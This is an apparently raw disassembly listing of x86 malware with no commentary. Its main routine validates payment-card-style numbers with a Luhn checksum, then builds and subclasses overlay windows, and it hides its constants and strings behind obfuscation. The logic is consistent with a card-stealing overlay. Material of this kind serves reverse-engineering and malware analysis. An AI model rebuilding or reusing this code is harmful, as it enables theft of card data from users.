call sub_425399
loc_41FE60: ; CODE XREF: .data:0041FE33�j
mov eax, ds:100130C8h
mov esi, eax
add esi, ds:100131D4h
sub esi, 2
jmp short loc_41FE97
; ---------------------------------------------------------------------------
loc_41FE72: ; CODE XREF: .data:0041FEA9�j
cmp byte ptr [ebp+esi-0FFh], 28h
jnz short loc_41FE84
mov byte ptr [ebp+esi-0FFh], 2Bh
loc_41FE84: ; CODE XREF: .data:0041FE7A�j
cmp byte ptr [ebp+esi-0FFh], 29h
jnz short loc_41FE96
mov byte ptr [ebp+esi-0FFh], 3Dh
loc_41FE96: ; CODE XREF: .data:0041FE8C�j
inc esi
loc_41FE97: ; CODE XREF: .data:0041FE70�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_41FEA0: ; CODE XREF: .data:0041FEA5�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FEA0
cmp esi, eax
jb short loc_41FE72
push 0FFh
lea eax, [ebp-1FEh]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_41A755
add esp, 0Ch
mov ebx, eax
mov eax, ds:10013158h
mov edi, eax
add edi, ds:1001320Ch
sub edi, 0Fh
jmp short loc_41FF08
; ---------------------------------------------------------------------------
loc_41FEDA: ; CODE XREF: .data:0041FF0A�j
movsx eax, byte ptr [ebp+edi-1FEh]
mov [ebp-218h], eax
mov eax, edi
mul edi
mov [ebp-21Ch], eax
mov eax, [ebp-218h]
mov edx, [ebp-21Ch]
sub eax, edx
mov [ebp+edi-1FEh], al
inc edi
loc_41FF08: ; CODE XREF: .data:0041FED8�j
cmp edi, ebx
jb short loc_41FEDA
mov eax, ds:10013110h
add eax, ds:10013094h
sub eax, 0Ah
push eax
push dword ptr [ebp+8]
lea eax, [ebp-1FEh]
push eax
call sub_41A8C2
add esp, 0Ch
mov [ebp-214h], eax
mov eax, ds:10013140h
add eax, 0FFF6h
cmp [ebp-214h], eax
jz short loc_41FF56
push dword ptr [ebp-208h]
call dword ptr ds:1000F61Ch
xor eax, eax
inc eax
jmp short loc_41FF93
; ---------------------------------------------------------------------------
loc_41FF56: ; CODE XREF: .data:0041FF43�j
mov eax, [ebp-20Ch]
mov edx, ds:10013274h
add edx, ds:100130A8h
sub edx, 2
add eax, edx
add [ebp-204h], eax
mov eax, [ebp-210h]
cmp [ebp-204h], eax
jb loc_41FE0A
push dword ptr [ebp-208h]
call dword ptr ds:1000F61Ch
xor eax, eax
loc_41FF93: ; CODE XREF: .data:0041FDF1�j
; .data:0041FF54�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41FF98 proc near ; CODE XREF: sub_41A999+BA9�p
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_304 = dword ptr -304h
var_300 = dword ptr -300h
var_2FC = dword ptr -2FCh
var_2F8 = dword ptr -2F8h
var_2F4 = dword ptr -2F4h
var_2F0 = dword ptr -2F0h
var_2EC = dword ptr -2ECh
var_2E8 = dword ptr -2E8h
var_2E4 = dword ptr -2E4h
var_2E0 = dword ptr -2E0h
var_2DC = dword ptr -2DCh
var_2D8 = dword ptr -2D8h
var_2D4 = dword ptr -2D4h
var_2D0 = dword ptr -2D0h
var_2CC = dword ptr -2CCh
var_2C6 = byte ptr -2C6h
var_2C4 = dword ptr -2C4h
var_2C0 = dword ptr -2C0h
var_2BC = dword ptr -2BCh
var_2B8 = dword ptr -2B8h
var_2B4 = dword ptr -2B4h
var_2B0 = dword ptr -2B0h
var_2AC = dword ptr -2ACh
var_2A8 = dword ptr -2A8h
var_2A4 = dword ptr -2A4h
var_2A0 = dword ptr -2A0h
var_29C = dword ptr -29Ch
var_298 = dword ptr -298h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = dword ptr -28Ch
var_288 = dword ptr -288h
var_284 = dword ptr -284h
var_280 = dword ptr -280h
var_27C = dword ptr -27Ch
var_278 = dword ptr -278h
var_274 = dword ptr -274h
var_270 = dword ptr -270h
var_26C = dword ptr -26Ch
var_268 = dword ptr -268h
var_264 = dword ptr -264h
var_260 = dword ptr -260h
var_25C = dword ptr -25Ch
var_258 = dword ptr -258h
var_253 = byte ptr -253h
var_23F = byte ptr -23Fh
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = dword ptr -124h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_118 = dword ptr -118h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_104 = byte ptr -104h
var_102 = word ptr -102h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
var_FE = byte ptr -0FEh
var_F5 = byte ptr -0F5h
var_F4 = byte ptr -0F4h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 324h
push ebx
push esi
push edi
cmp [ebp+arg_4], 0
jz loc_420FC7
mov eax, [ebp+arg_0]
mov al, [eax]
cmp al, 34h
jz short loc_41FFBF
cmp al, 35h
jnz loc_420FC7
loc_41FFBF: ; CODE XREF: sub_41FF98+1D�j
mov eax, [ebp+arg_0]
mov ecx, eax
or eax, 0FFFFFFFFh
loc_41FFC7: ; CODE XREF: sub_41FF98+34�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41FFC7
mov [ebp+var_128], eax
mov edx, ds:100131ACh
add edx, 0Bh
cmp eax, edx
jz short loc_41FFF3
movsx edx, word ptr ds:10013118h
add edx, 10h
cmp eax, edx
jnz loc_420FC7
loc_41FFF3: ; CODE XREF: sub_41FF98+47�j
mov ebx, ds:10013254h
sub ebx, 9
jmp short loc_420022
; ---------------------------------------------------------------------------
loc_41FFFE: ; CODE XREF: sub_41FF98+94�j
mov eax, 30h
mul ebx
mov [ebp+var_260], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_260]
cmp ds:10010370h[edx], eax
jz loc_420FC7
inc ebx
loc_420022: ; CODE XREF: sub_41FF98+64�j
mov eax, ds:10013138h
add eax, 64h
cmp ebx, eax
jb short loc_41FFFE
mov eax, ds:10013234h
add eax, 0Fh
cmp [ebp+var_128], eax
jnz loc_42020D
mov eax, [ebp+arg_0]
mov al, [eax+4]
cmp al, 2Dh
jz short loc_420054
cmp al, 20h
jnz loc_420FC7
loc_420054: ; CODE XREF: sub_41FF98+B2�j
mov eax, [ebp+arg_0]
mov al, [eax+9]
cmp al, 2Dh
jz short loc_420066
cmp al, 20h
jnz loc_420FC7
loc_420066: ; CODE XREF: sub_41FF98+C4�j
mov eax, [ebp+arg_0]
mov al, [eax+0Eh]
cmp al, 2Dh
jz short loc_420078
cmp al, 20h
jnz loc_420FC7
loc_420078: ; CODE XREF: sub_41FF98+D6�j
mov eax, ds:100131ACh
mov edx, [ebp+arg_0]
mov dl, [edx]
mov [ebp+eax+var_104], dl
mov eax, ds:10013270h
mov edx, [ebp+arg_0]
mov dl, [edx+1]
mov byte ptr [ebp+eax+var_102], dl
mov eax, ds:100131D4h
mov edx, [ebp+arg_0]
mov dl, [edx+2]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:10013100h
movsx edx, word ptr ds:10013174h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+3]
mov [ebp+eax+var_106], dl
mov eax, ds:10013220h
mov edx, [ebp+arg_0]
mov dl, [edx+5]
mov [ebp+eax+var_FF], dl
mov eax, ds:1001310Ch
add eax, ds:10013248h
mov edx, [ebp+arg_0]
mov dl, [edx+6]
mov [ebp+eax+var_100], dl
movsx eax, word ptr ds:10013208h
mov edx, [ebp+arg_0]
mov dl, [edx+7]
mov [ebp+eax+var_FE], dl
mov eax, ds:100130F8h
movsx edx, word ptr ds:10013230h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+8]
mov [ebp+eax+var_105], dl
mov eax, ds:1001315Ch
mov edx, [ebp+arg_0]
mov dl, [edx+0Ah]
mov [ebp+eax+var_100], dl
movsx eax, word ptr ds:100130A4h
mov edx, ds:100130ACh
lea eax, [eax+edx+2]
mov edx, [ebp+arg_0]
mov dl, [edx+0Bh]
mov [ebp+eax+var_FF], dl
mov eax, ds:10013154h
inc eax
add eax, ds:100131A8h
mov edx, [ebp+arg_0]
mov dl, [edx+0Ch]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:1001324Ch
mov edx, ds:1001318Ch
lea eax, [eax+edx+2]
mov edx, [ebp+arg_0]
mov dl, [edx+0Dh]
mov [ebp+eax+var_FF], dl
mov eax, ds:100130DCh
add eax, 6
movsx edx, word ptr ds:100131F0h
add eax, edx
mov edx, [ebp+arg_0]
mov dl, [edx+0Fh]
mov [ebp+eax+var_FF], dl
movsx eax, word ptr ds:10013260h
mov edx, [ebp+arg_0]
mov dl, [edx+10h]
mov [ebp+eax+var_F4], dl
movsx eax, word ptr ds:10013230h
movsx edx, word ptr ds:1001316Ch
lea eax, [eax+edx+7]
mov edx, [ebp+arg_0]
mov dl, [edx+11h]
mov [ebp+eax+var_FF], dl
mov eax, ds:10013094h
add eax, 4
add eax, ds:1001317Ch
mov edx, [ebp+arg_0]
mov dl, [edx+12h]
mov [ebp+eax+var_FF], dl
mov eax, ds:1001319Ch
mov edx, ds:100130D4h
sub edx, 6
mov [ebp+eax+var_F5], dl
jmp short loc_42021C
; ---------------------------------------------------------------------------
loc_42020D: ; CODE XREF: sub_41FF98+A4�j
push [ebp+arg_0]
lea eax, [ebp+var_FF]
push eax
call sub_425399
loc_42021C: ; CODE XREF: sub_41FF98+273�j
mov eax, ds:10013158h
mov esi, eax
add esi, ds:1001325Ch
sub esi, 11h
jmp short loc_420243
; ---------------------------------------------------------------------------
loc_42022E: ; CODE XREF: sub_41FF98+2B9�j
mov al, [ebp+esi+var_FF]
cmp al, 30h
jl short loc_42023D
cmp al, 39h
jle short loc_420242
loc_42023D: ; CODE XREF: sub_41FF98+29F�j
jmp loc_420FC7
; ---------------------------------------------------------------------------
loc_420242: ; CODE XREF: sub_41FF98+2A3�j
inc esi
loc_420243: ; CODE XREF: sub_41FF98+294�j
mov eax, ds:1001320Ch
inc eax
add eax, ds:10013214h
cmp esi, eax
jb short loc_42022E
mov eax, ds:10013210h
add eax, ds:100131A8h
sub eax, 3
mov [ebp-108h], eax
mov eax, ds:100131ACh
movsx edx, word ptr ds:10013180h
mov esi, eax
add esi, edx
sub esi, 9
jmp short loc_4202C7
; ---------------------------------------------------------------------------
loc_42027C: ; CODE XREF: sub_41FF98+339�j
movsx eax, [ebp+esi+var_FF]
sub eax, 30h
movsx edx, word ptr ds:10013100h
movsx ecx, word ptr ds:10013104h
add edx, ecx
sub edx, 9
imul eax, edx
add [ebp-108h], eax
cmp [ebp+esi+var_FF], 34h
jle short loc_4202BD
movsx eax, word ptr ds:10013250h
add eax, 8
sub [ebp-108h], eax
loc_4202BD: ; CODE XREF: sub_41FF98+313�j
mov eax, ds:100131B8h
sub eax, 3
add esi, eax
loc_4202C7: ; CODE XREF: sub_41FF98+2E2�j
mov eax, ds:10013268h
add eax, 0Ch
cmp esi, eax
jb short loc_42027C
mov eax, ds:10013120h
mov ebx, eax
add ebx, ds:1001315Ch
sub ebx, 0Dh
jmp short loc_420303
; ---------------------------------------------------------------------------
loc_4202E5: ; CODE XREF: sub_41FF98+375�j
movsx eax, [ebp+ebx+var_FF]
sub eax, 30h
add [ebp-108h], eax
mov eax, ds:10013190h
add eax, ds:1001318Ch
add ebx, eax
loc_420303: ; CODE XREF: sub_41FF98+34B�j
mov eax, ds:10013094h
add eax, 0Ah
cmp ebx, eax
jb short loc_4202E5
mov eax, [ebp-108h]
mov ecx, 0Ah
xor edx, edx
div ecx
movsx edi, word ptr ds:100131A4h
add edi, ds:1001311Ch
sub edi, 0Ch
cmp edx, edi
jnz loc_420FC7
lea eax, [ebp+var_FF]
push eax
call dword ptr ds:10012774h
pop ecx
or eax, eax
jnz loc_420FC7
mov esi, ds:100131F8h
sub esi, 3
mov eax, ds:100131D0h
mov esi, eax
add esi, ds:10013284h
sub esi, 10h
jmp short loc_42037F
; ---------------------------------------------------------------------------
loc_420367: ; CODE XREF: sub_41FF98+3F7�j
mov eax, 30h
mul esi
mov [ebp+var_264], eax
cmp dword ptr ds:10010370h[eax], 0
jz short loc_420391
inc esi
loc_42037F: ; CODE XREF: sub_41FF98+3CD�j
mov eax, ds:10013220h
add eax, 5Eh
add eax, ds:100131D4h
cmp esi, eax
jb short loc_420367
loc_420391: ; CODE XREF: sub_41FF98+3E4�j
mov eax, ds:100130ACh
add eax, 63h
cmp esi, eax
jz loc_420FC7
mov eax, 30h
mul esi
mov [ebp+var_268], eax
mov eax, [ebp+arg_4]
mov edx, [ebp+var_268]
mov ds:10010370h[edx], eax
push 10014081h
call sub_41E914
pop ecx
push 0
push eax
push 0
push [ebp+arg_4]
call dword ptr ds:1001263Ch
mov [ebp+var_134], eax
test eax, eax
jnz short loc_4203EA
mov eax, [ebp+arg_4]
mov [ebp+var_134], eax
loc_4203EA: ; CODE XREF: sub_41FF98+447�j
push 10014074h
call sub_41E914
push eax
push [ebp+var_134]
call sub_421AF0
mov [ebp+var_12C], eax
push 10014068h
call sub_41E914
push eax
push [ebp+var_12C]
call sub_421AF0
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_26C], eax
mov ebx, eax
mov ds:10010374h[ebx], edi
push 0
mov eax, 30h
mul esi
mov [ebp+var_270], eax
push dword ptr ds:10010374h[eax]
call dword ptr ds:1001265Ch
lea eax, [ebp+var_11C]
push eax
push [ebp+var_12C]
call dword ptr ds:10012654h
push 0
call dword ptr ds:1000F5E8h
mov [ebp+var_10C], eax
push 1001405Eh
call sub_41E914
add esp, 1Ch
push 0
push [ebp+var_10C]
push 0
push [ebp+var_12C]
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
push edi
mov edi, [ebp+var_114]
sub edi, [ebp+var_11C]
push edi
mov edi, ds:100131F8h
sub edi, 3
push edi
movsx edi, word ptr ds:10013178h
sub edi, 4
push edi
push 50800000h
lea edi, [ebp+var_FF]
push edi
push eax
push 200h
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_274], eax
mov ebx, eax
mov ds:10010378h[ebx], edi
mov edi, [ebp+var_110]
sub edi, [ebp+var_118]
movsx ebx, word ptr ds:10013240h
mov edx, ds:100130F0h
lea ebx, [ebx+edx+0F7h]
sub edi, ebx
mov ebx, ds:10013248h
add ebx, 37h
add ebx, ds:10013200h
mov eax, edi
sub eax, ebx
xor edx, edx
test eax, eax
setl dl
add eax, edx
sar eax, 1
mov [ebp+var_124], eax
mov eax, ds:100130B4h
movsx edx, word ptr ds:100131E0h
add eax, edx
sub eax, 0Bh
cmp [ebp+var_124], eax
jge short loc_42055A
mov eax, ds:10013128h
sub eax, 8
mov [ebp+var_124], eax
loc_42055A: ; CODE XREF: sub_41FF98+5B2�j
mov eax, [ebp+var_114]
sub eax, [ebp+var_11C]
movsx edx, word ptr ds:100131A4h
movsx ecx, word ptr ds:10013180h
lea edx, [edx+ecx+22h]
sub eax, edx
mov [ebp+var_120], eax
push 10014054h
call sub_41E914
mov [ebp+var_278], eax
push 1001403Bh
call sub_41E914
mov [ebp+var_27C], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_280], eax
mov edi, eax
push dword ptr ds:10010378h[edi]
movsx edi, word ptr ds:10013230h
add edi, 36h
push edi
push [ebp+var_120]
push [ebp+var_124]
movsx edi, word ptr ds:100130BCh
mov ebx, ds:100131CCh
lea edi, [edi+ebx+5]
push edi
push 50800000h
mov edi, [ebp+var_27C]
push edi
mov edi, [ebp+var_278]
push edi
mov edi, ds:100131D4h
add edi, ds:1001321Ch
sub edi, 0Ah
push edi
call dword ptr ds:1001164Ch
mov [ebp+var_138], eax
push 10014031h
call sub_41E914
mov [ebp+var_284], eax
push 1001402Dh
call sub_41E914
mov [ebp+var_288], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_28C], eax
mov edi, eax
push dword ptr ds:10010378h[edi]
movsx edi, word ptr ds:1001324Ch
mov ebx, ds:100131D0h
lea edi, [edi+ebx+0EAh]
push edi
push [ebp+var_120]
mov edi, [ebp+var_124]
mov ebx, ds:10013108h
add ebx, 36h
add edi, ebx
mov ebx, ds:100130D4h
movsx edx, word ptr ds:10013178h
add ebx, edx
sub ebx, 9
add edi, ebx
push edi
mov edi, ds:100130ECh
add edi, 10h
push edi
push 50800009h
mov edi, [ebp+var_288]
push edi
mov edi, [ebp+var_284]
push edi
mov edi, ds:10013210h
dec edi
push edi
call dword ptr ds:1001164Ch
mov [ebp+var_13C], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, ds:100130B8h
sub eax, 3
push eax
mov eax, ds:100131ECh
add eax, ds:100131B8h
sub eax, 0Dh
push eax
movsx eax, word ptr ds:1001322Ch
movsx edx, word ptr ds:100131E0h
add eax, edx
sub eax, 0Ah
push eax
push 2BCh
mov eax, ds:1001320Ch
sub eax, 6
push eax
mov eax, ds:100130F0h
dec eax
push eax
mov eax, ds:100130E4h
dec eax
push eax
mov eax, ds:10013204h
add eax, 0Dh
add eax, ds:1001319Ch
push eax
call dword ptr ds:10010250h
mov [ebp+var_140], eax
push 1
push eax
push 30h
push [ebp+var_138]
call dword ptr ds:1000D014h
push 10014023h
call sub_41E914
mov [ebp+var_290], eax
push 1001401Eh
call sub_41E914
add esp, 18h
push 0
push [ebp+var_10C]
push 0
push [ebp+var_13C]
movsx edi, word ptr ds:10013240h
add edi, 0F8h
mov ebx, ds:10013204h
movsx edx, word ptr ds:10013124h
add ebx, edx
sub ebx, 3
sub edi, ebx
push edi
mov edi, [ebp+var_120]
mov ebx, ds:100131CCh
sub ebx, 2
sub edi, ebx
push edi
movsx edi, word ptr ds:1001316Ch
movsx ebx, word ptr ds:10013150h
add edi, ebx
sub edi, 8
push edi
movsx edi, word ptr ds:100131C0h
movsx ebx, word ptr ds:100130C0h
add edi, ebx
sub edi, 5
push edi
push 50000000h
push eax
mov edi, [ebp+var_290]
push edi
mov edi, ds:100130E4h
add edi, ds:10013268h
sub edi, 0Dh
push edi
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_294], eax
mov ebx, eax
mov ds:1001037Ch[ebx], edi
mov eax, ds:100130E4h
cmp [ebp+eax+var_108], 34h
jnz short loc_420837
push 10014016h
call sub_41E914
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_425399
jmp short loc_42084F
; ---------------------------------------------------------------------------
loc_420837: ; CODE XREF: sub_41FF98+883�j
push 10014008h
call sub_41E914
pop ecx
push eax
lea edi, [ebp+var_253]
push edi
call sub_425399
loc_42084F: ; CODE XREF: sub_41FF98+89D�j
push 10013F96h
call sub_41E914
lea edi, [ebp+var_FF]
push edi
lea edi, [ebp+var_253]
push edi
push eax
lea edi, [ebp+var_23F]
push edi
call dword ptr ds:10012634h
push 10013F8Ch
call sub_41E914
mov [ebp+var_298], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_29C], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
mov edi, ds:10013164h
add edi, 2Ch
push edi
push [ebp+var_120]
mov edi, ds:100131E4h
add edi, 6
push edi
mov edi, ds:10013244h
movsx ebx, word ptr ds:100130B0h
add edi, ebx
dec edi
push edi
push 50000000h
lea edi, [ebp+var_23F]
push edi
mov edi, [ebp+var_298]
push edi
mov edi, ds:10013188h
add edi, ds:10013090h
sub edi, 3
push edi
call dword ptr ds:1001164Ch
mov [ebp+var_258], eax
push 0
push 2
push 0
push 0
push 5
push 1
mov eax, ds:1001319Ch
sub eax, 6
push eax
mov eax, ds:10013158h
sub eax, 9
push eax
movsx eax, word ptr ds:100130D0h
sub eax, 7
push eax
push 190h
movsx eax, word ptr ds:10013208h
add eax, ds:10013120h
sub eax, 0Ah
push eax
mov eax, ds:100131ACh
add eax, ds:1001323Ch
sub eax, 0Ah
push eax
mov eax, ds:100131D0h
add eax, ds:100130ACh
sub eax, 2
push eax
mov eax, ds:10013220h
add eax, 0Ch
push eax
call dword ptr ds:10010250h
mov [ebp+var_130], eax
push 1
push eax
push 30h
push [ebp+var_258]
call dword ptr ds:1000D014h
push 10013F80h
call sub_41E914
mov [ebp+var_2A0], eax
push 10013F7Ch
call sub_41E914
mov [ebp+var_2A4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2A8], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
mov edi, ds:10013200h
add edi, 11Fh
add edi, ds:100131ECh
push edi
mov edi, ds:100131B8h
add edi, 2Dh
push edi
mov edi, ds:100130F0h
add edi, 45h
movsx ebx, word ptr ds:10013208h
add edi, ebx
push edi
movsx edi, word ptr ds:10013118h
add edi, ds:10013254h
sub edi, 2
push edi
push 50800003h
mov edi, [ebp+var_2A4]
push edi
mov edi, [ebp+var_2A0]
push edi
mov edi, ds:10013168h
add edi, ds:1001312Ch
sub edi, 8
push edi
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2AC], eax
mov ebx, eax
mov ds:10010380h[ebx], edi
push 10013F70h
call sub_41E914
mov [ebp+var_2B0], eax
push 10013F6Ch
call sub_41E914
add esp, 28h
mov [ebp+var_2B4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2B8], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
mov edi, ds:100131B0h
add edi, 125h
push edi
mov edi, ds:100131ACh
add edi, 34h
add edi, ds:100131A0h
push edi
mov edi, ds:1001325Ch
add edi, 41h
add edi, ds:100131D4h
push edi
mov edi, ds:10013120h
lea edi, [edi+edi+3Ch]
push edi
push 50800003h
mov edi, [ebp+var_2B4]
push edi
mov edi, [ebp+var_2B0]
push edi
movsx edi, word ptr ds:100130E0h
add edi, ds:10013108h
sub edi, 7
push edi
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2BC], eax
mov ebx, eax
mov ds:10010384h[ebx], edi
movsx eax, word ptr ds:100130E8h
add eax, ds:100131F8h
sub eax, 3
mov [ebp+var_102], ax
jmp loc_420BE3
; ---------------------------------------------------------------------------
loc_420B1D: ; CODE XREF: sub_41FF98+C5E�j
push 10013F64h
call sub_41E914
movzx edi, [ebp+var_102]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call dword ptr ds:10012634h
lea eax, [ebp+var_2C6]
push eax
movsx eax, word ptr ds:10013208h
movsx edx, word ptr ds:10013124h
add eax, edx
sub eax, 0Bh
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:1000D014h
push 10013F5Ah
call sub_41E914
movzx edi, [ebp+var_102]
movsx ebx, word ptr ds:100130E0h
lea edi, [edi+ebx+5]
push edi
push eax
lea edi, [ebp+var_2C6]
push edi
call dword ptr ds:10012634h
add esp, 20h
lea eax, [ebp+var_2C6]
push eax
movsx eax, word ptr ds:100130A4h
add eax, ds:10013134h
sub eax, 0Eh
push eax
push 143h
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:1000D014h
inc [ebp+var_102]
loc_420BE3: ; CODE XREF: sub_41FF98+B80�j
movzx eax, [ebp+var_102]
movsx edx, word ptr ds:10013208h
add edx, 8
cmp eax, edx
jl loc_420B1D
push 10013F52h
call sub_41E914
mov [ebp+var_2C0], eax
push 10013F4Eh
call sub_41E914
mov [ebp+var_2C4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp-2C8h], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
mov edi, ds:10013204h
add edi, 17h
push edi
movsx edi, word ptr ds:100130BCh
mov ebx, ds:100131D8h
lea edi, [edi+ebx+43h]
push edi
mov edi, ds:100131ECh
add edi, 74h
push edi
mov edi, ds:100131F4h
add edi, 2Bh
push edi
push 50800000h
mov edi, [ebp+var_2C4]
push edi
mov edi, [ebp+var_2C0]
push edi
push 200h
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2CC], eax
mov ebx, eax
mov ds:10010388h[ebx], edi
mov eax, ds:100131D4h
sub eax, 2
push eax
push 58h
push 0CCh
mov eax, 30h
mul esi
mov [ebp+var_2D0], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:1000D014h
push 10013F44h
call sub_41E914
mov [ebp+var_2D4], eax
push 10013F22h
call sub_41E914
mov [ebp+var_2D8], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2DC], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
movsx edi, word ptr ds:1001327Ch
add edi, 3Ch
push edi
push [ebp+var_120]
movsx edi, word ptr ds:10013100h
add edi, 4Ch
push edi
movsx edi, word ptr ds:100130C0h
add edi, 94h
push edi
push 50000000h
mov edi, [ebp+var_2D8]
push edi
mov edi, [ebp+var_2D4]
push edi
movsx edi, word ptr ds:100131E0h
movsx ebx, word ptr ds:10013174h
add edi, ebx
sub edi, 0Ah
push edi
call dword ptr ds:1001164Ch
mov [ebp+var_25C], eax
push 1
push [ebp+var_130]
push 30h
push eax
call dword ptr ds:1000D014h
push 10013F18h
call sub_41E914
mov [ebp+var_2E0], eax
push 10013EFEh
call sub_41E914
add esp, 18h
mov [ebp+var_2E4], eax
push 0
push [ebp+var_10C]
push 0
mov eax, 30h
mul esi
mov [ebp+var_2E8], eax
mov edi, eax
push dword ptr ds:1001037Ch[edi]
movsx edi, word ptr ds:10013150h
mov ebx, ds:10013288h
lea edi, [edi+ebx+9]
push edi
mov edi, ds:100131E4h
add edi, 97h
push edi
mov edi, ds:100131B0h
add edi, 0F1h
add edi, ds:10013278h
mov ebx, ds:10013198h
add ebx, 1Eh
movsx edx, word ptr ds:100131E0h
add ebx, edx
sub edi, ebx
push edi
movsx edi, word ptr ds:100130D0h
add edi, 3
push edi
push 50800000h
mov edi, [ebp+var_2E4]
push edi
mov edi, [ebp+var_2E0]
push edi
mov edi, ds:1001317Ch
sub edi, 5
push edi
call dword ptr ds:1001164Ch
mov edi, eax
mov eax, 30h
mul esi
mov [ebp+var_2EC], eax
mov ebx, eax
mov ds:1001038Ch[ebx], edi
push 1
push [ebp+var_130]
mov eax, 30h
push 30h
mul esi
mov [ebp+var_2F0], eax
push dword ptr ds:1001038Ch[eax]
call dword ptr ds:1000D014h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2F4], eax
mov [ebp+var_2F8], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:10012628h
mov edi, [ebp+var_2F8]
mov ds:10010390h[edi], eax
push 100089F6h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_2FC], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:1000F5FCh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_300], eax
mov [ebp+var_304], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:10012628h
mov edi, [ebp+var_304]
mov ds:10010394h[edi], eax
push 100089F6h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_308], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:1000F5FCh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_30C], eax
mov [ebp+var_310], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:10012628h
mov edi, [ebp+var_310]
mov ds:10010398h[edi], eax
push 100089F6h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_314], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:1000F5FCh
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_318], eax
mov [ebp+var_31C], eax
push dword ptr ds:1001037Ch[eax]
call dword ptr ds:10012628h
mov edi, [ebp+var_31C]
mov ds:1001039Ch[edi], eax
push 100089F6h
push 0FFFFFFFCh
mov eax, 30h
mul esi
mov [ebp+var_320], eax
push dword ptr ds:1001037Ch[eax]
call dword ptr ds:1000F5FCh
mov eax, 30h
mul esi
mov [ebp+var_324], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:1000FA40h
loc_420FC7: ; CODE XREF: sub_41FF98+10�j
; sub_41FF98+21�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41FF98 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, ds:1001320Ch
add eax, ds:10013198h
sub eax, 8
cmp ds:10012784h, eax
jbe short loc_420FF0
push 10012784h
call dword ptr ds:1000D010h
loc_420FF0: ; CODE XREF: .data:00420FE3�j
mov eax, ds:10012784h
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
mov eax, [ebp+0Ch]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call dword ptr ds:1000F618h
pop edi
pop ebp
retn 10h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 15Ch
push ebx
push esi
push edi
call sub_41C1EB
call sub_41D8C0
call sub_41D7D9
call sub_41B8EA
call sub_423158
call sub_41BAAB
call sub_41E67B
